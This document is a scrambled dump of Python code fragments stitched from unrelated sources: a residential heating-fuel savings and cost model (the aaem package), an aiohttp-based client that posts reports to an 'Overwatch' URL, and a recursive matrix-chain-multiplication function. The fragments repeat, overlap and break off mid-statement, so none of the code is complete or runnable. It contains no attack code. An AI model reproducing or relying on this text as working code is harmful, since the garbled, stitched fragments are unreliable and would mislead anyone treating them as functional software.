self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed", "calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ---------- capital_costs : float total cost", "- r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec", "Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag = None, prerequisites =", "dictionary of components, optional prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics", "propane consumption savings_kWh : float savings in electric consumption savings_mmbtu: float total savings", "self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population", "= np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil", "Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\":", "self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\", "------- float: fuel consumed for a type of fuel \"\"\" HH_consumption = HH", "fuel saved. Returns ------- float the total fuel saved in gallons \"\"\" base_heat", "def get_total_energy_produced (self): \"\"\"Get total energy produced. 
Returns ------- float the total energy", "* (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP)", "self.reason = \"Not a residential project.\" return # needed for electric or HF", "Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential:", "b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost =", "scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price']", "self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs", "residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities", "Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass", "Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost", "CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants as constants", "self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 #", ": dictionary general data for a community. 
Initial value: 'community' section of community_data", "Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil", "Returns ------- float the total fuel saved in gallons \"\"\" base_heat = \\", "Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption", "proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption", "False self.reason = \"Not a residential project.\" return # needed for electric or", "Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(),", "initial natural gas fuel consumption init_LP : float initial propane consumption init_kWh :", "self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost =", "forecast for a community diagnostics : diagnostics, optional diagnostics for tracking error/warning messages", "\"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years,", "6000.0 # comes from. 
con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year'])", "(gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential:", "float: fuel consumed for a type of fuel \"\"\" HH_consumption = HH *", "b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost", "(kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year)", "of components, optional prerequisite component data this component has no prerequisites leave empty", "(kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating", "(cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass", "def calc_init_HH (self): \"\"\"Estimate the # of households for the first year of", "All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil", "= int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population /", "Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post", "Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year)", "Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption", "* \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ 
self.baseline_fuel_LP_consumption", "get_total_energy_produced (self): \"\"\"Get total energy produced. Returns ------- float the total energy produced", "self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption *", "np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH", "cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline", "these function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF", "Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas", "household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption", "init_LP : float initial propane consumption init_kWh : float initial electric consumption \"\"\"", "np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption :", "= int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each", "s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption", "total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the total consumption Parameters ----------", "that can be retrofit savings_HF : float savings in heating oil consumption savings_wood", "oil consumption init_wood : float initial heating cordwood consumption init_gas : float initial", "electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast", 
"\"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory):", "s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption", "calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the total", "== False Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run = True self.reason", "= \"Not a residential project.\" return # needed for electric or HF component", "the # of households for the first year of the project Attributes ----------", "self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility", "\"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def", "price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas", "retrofit as of 2010, the performance improvements as a percentage of the pre-retrofit", "= self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line", "Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential:", "factor Returns ------- float: fuel consumed for a type of fuel \"\"\" HH_consumption", "\"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption", "\"gas_residential_consumed [mmbtu/year]\", years, 
self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years,", "self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if", "total fuel saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\", "= kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate", "\"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption", "Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating", "(gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil", "\"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\",", "needed for electric or HF component and has a default value self.calc_avg_consumption() if", "Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating", ".ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price =", "years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output csv in directory", "= np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH,", "annual heating savings created by the project Attributes 
---------- annual_heating_savings : np.array heating", "for this component to run. Parameters ---------- scalers : dictionary of valid scalers,", "valid scalers, optional Scalers to adjust normal run variables. See note on accepted", "= b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption *", "s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio =", "self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price", "= int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con =", "np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df", "self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas", "#~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0", "int Houses that can be retrofit savings_HF : float savings in heating oil", "\"calculate Houses to retrofit was negative, setting to 0\" ) ## % as", "\"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost", "(gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating", "self.cd[\"model electricity\"]: 
self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption()", "prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def", "Initial value: 'community' section of community_data comp_specs : dictionary component specific data for", "cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price =", "forecast module, see information on Forecast Object aaem.diagnostics : diagnostics module, see information", "np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "= \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption =", "savings_mmbtu: float total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH", "Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\":", "self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh", "($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError: pass df =", "self.was_run = True self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag) >", "self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost", "self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() 
self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs'])", "(1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def", ") yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total", "- r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio", "init_kWh : float initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption" ]
[ "if self._session is None: raise Exception('Not in context block') post_kwargs = dict( json=report_data,", "%s with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp:", "POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as", "smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except", "resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post report to {!r}:", "async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as", "= 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def", "client_session self._report_url = report_url self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data,", "as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class", "class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session =", "in context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token '", "assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None:", "is None: raise Exception('Not in context block') post_kwargs = dict( json=report_data, headers={ 'Accept':", "post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient:", "report_url') if self._session 
is None: raise Exception('Not in context block') post_kwargs = dict(", "pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session", "self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status()", "class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url = report_url", "OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url = report_url self._report_token", "with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e:", "self._session is None: raise Exception('Not in context block') post_kwargs = dict( json=report_data, headers={", "'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with", "with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response:", "logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception):", "}, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload: %s', self._report_url, smart_repr(report_data))", "Overwatch report - POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async with", "<gh_stars>0 from aiohttp import ClientSession from logging import getLogger from reprlib import repr", "%r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post report to", "report_url, report_token): self._session = client_session self._report_url = report_url 
self._report_token = report_token async def", "dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending", "30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self,", "pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url =", "import repr as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception):", "try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception", "logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post report", "'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST", "class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session,", "+ self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload: %s',", "__init__(self, client_session, report_url, report_token): self._session = client_session self._report_url = report_url self._report_token = report_token", "def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if", "report - POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url,", "logger.debug('Sending Overwatch report - POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async", "getLogger from reprlib import repr as smart_repr 
logger = getLogger(__name__) post_timeout_s = 30", "from reprlib import repr as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class", "self._report_url = report_url self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data, dict)", "send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session", "getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class", "reprlib import repr as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError", "report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is", "raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in context block') post_kwargs", "logging import getLogger from reprlib import repr as smart_repr logger = getLogger(__name__) post_timeout_s", "self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise", "import getLogger from reprlib import repr as smart_repr logger = getLogger(__name__) post_timeout_s =", "isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise", "not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in context", "def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url = report_url self._report_token =", "self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in context block')", "dict) if 
not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not", "context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' +", "**post_kwargs) as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed", "raise Exception('Not in context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization':", "OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session", "Exception('Not in context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token", "ClientSession from logging import getLogger from reprlib import repr as smart_repr logger =", "' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload:", "report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No", "= report_url self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if", "report_url self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if not", "async def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url')", "post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, },", "resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post report to {!r}: {!r}'.format(self._report_url,", "= dict( json=report_data, headers={ 'Accept': 'application/json', 
'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s)", "repr as smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass", "headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report", "'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s", "smart_repr logger = getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError", "import ClientSession from logging import getLogger from reprlib import repr as smart_repr logger", "%s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: logger.debug('Response: %r', resp)", "OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in context block') post_kwargs =", "self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload: %s', self._report_url,", "aiohttp import ClientSession from logging import getLogger from reprlib import repr as smart_repr", "self._report_token = report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url:", "OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url,", "'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch report -", "except Exception as e: raise OverwatchClientReportError('Failed to post report to {!r}: {!r}'.format(self._report_url, e))", "report_token): self._session = client_session self._report_url = report_url self._report_token = report_token async def 
send_report(self,", "as resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to", "= getLogger(__name__) post_timeout_s = 30 class OverwatchClientNotConfiguredError (Exception): pass class OverwatchClientReportError (Exception): pass", "resp: logger.debug('Response: %r', resp) resp.raise_for_status() except Exception as e: raise OverwatchClientReportError('Failed to post", "client_session, report_url, report_token): self._session = client_session self._report_url = report_url self._report_token = report_token async", "json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token, }, timeout=post_timeout_s) logger.debug('Sending Overwatch", "timeout=post_timeout_s) logger.debug('Sending Overwatch report - POST %s with payload: %s', self._report_url, smart_repr(report_data)) try:", "None: raise Exception('Not in context block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json',", "if not self._report_url: raise OverwatchClientNotConfiguredError('No report_url') if self._session is None: raise Exception('Not in", "= client_session self._report_url = report_url self._report_token = report_token async def send_report(self, report_data): assert", "block') post_kwargs = dict( json=report_data, headers={ 'Accept': 'application/json', 'Authorization': 'token ' + self._report_token,", "- POST %s with payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs)", "(Exception): pass class OverwatchClientReportError (Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token):", "from logging import getLogger from reprlib import repr as smart_repr logger = getLogger(__name__)", "payload: %s', self._report_url, smart_repr(report_data)) try: async with self._session.post(self._report_url, **post_kwargs) as resp: 
logger.debug('Response: %r',", "= report_token async def send_report(self, report_data): assert isinstance(report_data, dict) if not self._report_url: raise", "from aiohttp import ClientSession from logging import getLogger from reprlib import repr as", "self._session = client_session self._report_url = report_url self._report_token = report_token async def send_report(self, report_data):", "(Exception): pass class OverwatchClient: def __init__(self, client_session, report_url, report_token): self._session = client_session self._report_url" ]
[ "arr = [1, 2, 3, 4, 3] n = len(arr) print(\"Minimum number of", "1] * p[k] * p[j]) if count < _min: _min = count #", "2, 3, 4, 3] n = len(arr) print(\"Minimum number of multiplications is \",", "''' if i == j: return 0 _min = sys.maxsize # place parenthesis", "''' Matrix A[i] has dimension p[i-1] x p[i] for i = 1..n '''", "Matrix A[i] has dimension p[i-1] x p[i] for i = 1..n ''' if", "test above function arr = [1, 2, 3, 4, 3] n = len(arr)", "between first and last matrix, # recursively calculate count of # multiplications for", "k + 1, j) + p[i - 1] * p[k] * p[j]) if", "for k in range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k", "of # multiplications for each parenthesis # placement and return the minimum count", "each parenthesis # placement and return the minimum count for k in range(i,", "calculate count of # multiplications for each parenthesis # placement and return the", "sys def MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1] x p[i]", "minimum count for k in range(i, j): count = (MatrixChainOrder(p, i, k) +", "return _min # Driver program to test above function arr = [1, 2,", "if i == j: return 0 _min = sys.maxsize # place parenthesis at", "1..n ''' if i == j: return 0 _min = sys.maxsize # place", "multiplications for each parenthesis # placement and return the minimum count for k", "first and last matrix, # recursively calculate count of # multiplications for each", "# recursively calculate count of # multiplications for each parenthesis # placement and", "placement and return the minimum count for k in range(i, j): count =", "in range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1,", "4, 3] n = len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr, 1,", "p[i] for i = 1..n ''' if i == j: return 0 _min", "+ MatrixChainOrder(p, k + 1, j) + p[i - 1] * p[k] *", "p[i-1] x p[i] for i = 1..n ''' if i == j: return", "last matrix, # recursively calculate count of # 
multiplications for each parenthesis #", "i, k) + MatrixChainOrder(p, k + 1, j) + p[i - 1] *", "to test above function arr = [1, 2, 3, 4, 3] n =", "# multiplications for each parenthesis # placement and return the minimum count for", "place parenthesis at different places # between first and last matrix, # recursively", "# Return minimum count return _min # Driver program to test above function", "places # between first and last matrix, # recursively calculate count of #", "0 _min = sys.maxsize # place parenthesis at different places # between first", "sys.maxsize # place parenthesis at different places # between first and last matrix,", "n = len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr, 1, n -", "count for k in range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p,", "i = 1..n ''' if i == j: return 0 _min = sys.maxsize", "== j: return 0 _min = sys.maxsize # place parenthesis at different places", "above function arr = [1, 2, 3, 4, 3] n = len(arr) print(\"Minimum", "= (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j) + p[i -", "3, 4, 3] n = len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr,", "j: return 0 _min = sys.maxsize # place parenthesis at different places #", "= 1..n ''' if i == j: return 0 _min = sys.maxsize #", "Driver program to test above function arr = [1, 2, 3, 4, 3]", "if count < _min: _min = count # Return minimum count return _min", "k in range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k +", "(MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j) + p[i - 1]", "i, j): ''' Matrix A[i] has 